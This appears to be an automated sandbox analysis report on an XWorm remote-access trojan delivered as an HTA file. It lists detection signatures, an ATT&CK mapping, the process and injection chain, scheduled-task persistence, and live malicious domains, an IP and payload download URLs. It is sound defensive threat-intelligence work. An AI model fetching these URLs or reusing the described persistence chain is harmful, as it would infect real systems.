              Source: Yara matchFile source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 9124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8756, type: MEMORYSTR
              Source: DanielPulse.scrBinary or memory string: WIN_81
              Source: DanielPulse.scrBinary or memory string: WIN_XP
              Source: DanielPulse.scrBinary or memory string: WIN_XPe
              Source: DanielPulse.scrBinary or memory string: WIN_VISTA
              Source: DanielPulse.scrBinary or memory string: WIN_7
              Source: DanielPulse.scrBinary or memory string: WIN_8
              Source: Carter.pif.20.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Carter.pif PID: 9124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8756, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,29_2_002E696E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,29_2_002E6E32
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,37_2_0095696E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,37_2_00956E32

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		2
              Valid Accounts              		11
              Windows Management Instrumentation              		111
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Email Collection              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		2
              Valid Accounts              		2
              Valid Accounts              		2
              Obfuscated Files or Information              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin Shares21
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		21
              Access Token Manipulation              		2
              Software Packing              		NTDS29
              System Information Discovery              		Distributed Component Object Model3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		2
              Registry Run Keys / Startup Folder              		212
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets51
              Security Software Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job              		111
              Masquerading              		Cached Domain Credentials41
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573971 Sample: c2.hta Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 92 myguyapp.com 2->92 94 me-work.com 2->94 96 3 other IPs or domains 2->96 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 114 18 other signatures 2->114 12 mshta.exe 16 2->12         started        16 wscript.exe 2->16         started        19 wscript.exe 2->19         started        signatures3 process4 dnsIp5 98 myguyapp.com 193.26.115.21, 443, 49708, 49710 QUICKPACKETUS Netherlands 12->98 76 C:\Users\user\AppData\Local\Temp\temp.bat, ASCII 12->76 dropped 78 C:\Users\user\AppData\Local\...\c[1].bat, ASCII 12->78 dropped 21 cmd.exe 3 2 12->21         started        24 cmd.exe 12->24         started        100 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->100 26 DanielPulse.scr 16->26         started        file6 signatures7 process8 signatures9 116 Suspicious powershell command line found 21->116 118 Drops PE files with a suspicious file extension 21->118 120 Uses schtasks.exe or at.exe to add and modify task schedules 21->120 28 msword.exe 21->28         started        30 powershell.exe 15 16 21->30         started        34 powershell.exe 21->34         started        40 3 other processes 21->40 36 conhost.exe 24->36         started        38 timeout.exe 24->38         started        process10 file11 42 cmd.exe 28->42         started        80 C:\Users\user\AppData\Local\Temp\f.pdf, PDF 30->80 dropped 122 Drops large PE files 30->122 124 Powershell drops PE file 30->124 82 C:\Users\user\AppData\Local\...\msword.exe, PE32 34->82 dropped 126 Loading BitLocker PowerShell Module 34->126 84 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 40->84 dropped 45 AcroCEF.exe 109 40->45         started        signatures12 process13 file14 72 C:\Users\user\AppData\Local\...\Carter.pif, PE32 42->72 dropped 47 Carter.pif 42->47         started        51 conhost.exe 42->51         started        53 tasklist.exe 42->53         started        57 7 other processes 42->57 55 AcroCEF.exe 45->55         started        process15 file16 86 C:\Users\user\AppData\...\DanielPulse.scr, PE32 47->86 dropped 88 C:\Users\user\AppData\...\DanielPulse.js, ASCII 47->88 dropped 90 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 47->90 dropped 102 Drops PE files with a suspicious file extension 47->102 104 Writes to foreign memory regions 47->104 106 Injects a PE file into a foreign processes 47->106 59 cmd.exe 47->59         started        62 cmd.exe 47->62         started        64 RegAsm.exe 47->64         started        signatures17 process18 file19 74 C:\Users\user\AppData\...\DanielPulse.url, MS 59->74 dropped 66 conhost.exe 59->66         started        68 conhost.exe 62->68         started        70 schtasks.exe 62->70         started        process20

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              c2.hta8%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\220239\Carter.pif8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\msword\msword.exe8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://myguyapp.com/f.pdfI0%Avira URL Cloudsafe
              https://myguyapp.com/c.batE&0%Avira URL Cloudsafe
              https://myguyapp.com/mswor0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPR0%Avira URL Cloudsafe
              https://myguyapp.com/x0%Avira URL Cloudsafe
              https://myguyapp.c0%Avira URL Cloudsafe
              https://myguyapp.com/c.bat0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zip100%Avira URL Cloudmalware
              https://myguyapp.com/0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zip&Y5=J0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW640%Avira URL Cloudsafe
              me-work.com0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfW0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl2=https:8X0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfl0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf6C0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=h0%Avira URL Cloudsafe
              https://myguyapp.com/c.batU0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf-0%Avira URL Cloudsafe
              https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfq0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdf:0%Avira URL Cloudsafe
              https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSER0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.210.172
              		truefalse
                		high
                me-work.com
                		193.26.115.21
                		truetrue
                  		unknown
                  myguyapp.com
                  		193.26.115.21
                  		truetrue
                    		unknown
                    x1.i.lencr.org
                    		unknown
                    		unknownfalse
                      		high
                      dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://myguyapp.com/msword.ziptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://myguyapp.com/c.battrue
                        • Avira URL Cloud: safe
                        		unknown
                        me-work.comtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://myguyapp.com/f.pdftrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://myguyapp.com/mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926563616.0000000003034000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://myguyapp.com/mswortasklist.exe, 00000016.00000002.1927426307.00000000031B0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.autoitscript.com/autoit3/Jmsword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000025.00000002.2002506530.00000000009A9000.00000002.00000001.01000000.00000011.sdmp, Missouri.14.dr, Carter.pif.20.drfalse
                          		high
                          https://myguyapp.com/msword.zip&Y5=Jcmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                            		high
                            https://myguyapp.com/f.pdfItasklist.exe, 00000018.00000002.1939808074.0000000003392000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1938952585.000000000338D000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1939094485.000000000338F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/xmshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.cRegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/c.batE&mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPRRegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrormsword.exe, 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000E.00000000.1903617710.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.13.drfalse
                              		high
                              https://myguyapp.com/f.pdfWRegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.autoitscript.com/autoit3/msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drfalse
                                		high
                                https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=hCarter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/msword.zipurl2=https:8XCarter.pif, 0000001D.00000002.3852624637.00000000016D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/f.pdf6Ctasklist.exe, 00000016.00000003.1926304834.0000000003010000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926192131.000000000300E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1927182501.0000000003012000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW64RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$tasklist.exe, 00000016.00000002.1927254392.000000000302F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926600854.000000000302E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/c.batUmshta.exe, 00000000.00000003.1916638287.000000000A437000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/f.pdfltasklist.exe, 00000018.00000002.1939736709.0000000003378000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/f.pdf-Carter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/f.pdfqmsword.exe, 0000000E.00000002.1969463085.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=userRegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000029.00000002.3852880211.00000000030A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERCarter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myguyapp.com/f.pdf:RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPRCarter.pif, 0000001D.00000003.1956168658.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1958820612.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955633417.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291958628.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953710429.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1956408269.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954557812.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955333455.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953745957.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953628491.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953575017.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291998783.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955168928.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291894384.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954636307.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954125310.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954495939.0000000000584000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  193.26.115.21
                                  		me-work.comNetherlands
                                  		46261QUICKPACKETUStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1573971
                                  Start date and time:2024-12-12 19:06:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 12m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:42
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:c2.hta
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winHTA@69/80@4/1
                                  EGA Information:
                                  • Successful, ratio: 80%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 106
                                  • Number of non-executed functions: 295
                                  Cookbook Comments:
                                  • Found application associated with file extension: .hta
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 23.195.61.56, 2.22.50.144, 2.22.50.131, 184.30.20.134, 92.122.101.8, 92.122.101.58, 23.218.208.109, 172.202.163.200, 23.206.229.226
                                  • Excluded domains from analysis (whitelisted): www.bing.com, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                  • Execution Graph export aborted for target mshta.exe, PID 7864 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: c2.hta

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  13:07:09API Interceptor92x Sleep call for process: mshta.exe modified
                                  13:07:10API Interceptor90x Sleep call for process: powershell.exe modified
                                  13:07:26API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                  13:08:36API Interceptor425x Sleep call for process: timeout.exe modified
                                  13:08:37API Interceptor4367x Sleep call for process: Carter.pif modified
                                  13:10:19API Interceptor948x Sleep call for process: RegAsm.exe modified
                                  19:08:00Task SchedulerRun new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                  19:08:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  193.26.115.21c2.htaGet hashmaliciousXWormBrowse
                                  • myguyapp.com/msword.zip

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  me-work.comc2.htaGet hashmaliciousXWormBrowse
                                  • 193.26.115.21
                                  c2.htaGet hashmaliciousXWormBrowse
                                  • 87.120.117.152
                                  p5.htaGet hashmaliciousXWormBrowse
                                  • 45.88.186.197
                                  bg.microsoft.map.fastly.net9MQYWJVQut.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Dec_2024 Shipment Packing List.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                  • 199.232.210.172
                                  Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Payment Advice - Advice RefA1VcCagmbe12 Priority payment Customer Ref3509477.msgGet hashmaliciousXWormBrowse
                                  • 199.232.210.172
                                  OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                  • 199.232.214.172
                                  HvASs4SYK9.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                  • 199.232.210.172
